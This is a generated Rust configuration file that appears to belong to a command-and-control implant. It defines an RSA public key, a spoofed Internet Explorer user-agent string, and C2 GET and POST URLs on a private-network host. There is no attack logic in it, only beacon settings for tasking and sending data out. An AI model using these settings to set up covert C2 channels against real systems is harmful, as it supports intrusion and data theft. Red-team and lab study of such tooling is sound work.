// Generated by generate_config.py
pub const PUB_KEY: &str = "-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCG96JU8HQUMI+KP/Cik9zzAavP
++Bht+wF++8+xf350Jrh72ozIg2CDmf6MUiLc6WHW7Dralj5ELi/smlaftVdGFQM
LTYiIrLZ/6lpp1aIICVzo6p5s5/VRp7W6biqRekPFLBqajdjKPVKFF1y56TzDHT8
lPEVpCPD5xRBvnbmdQIDAQAB
-----END PUBLIC KEY-----";
pub const USER_AGENT: &str =
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)";
pub const C2_GET_URL: &str = "http://192.168.1.106:8080/fwlink";
pub const C2_POST_URL: &str = "http://192.168.1.106:8080/submit.php?id=";
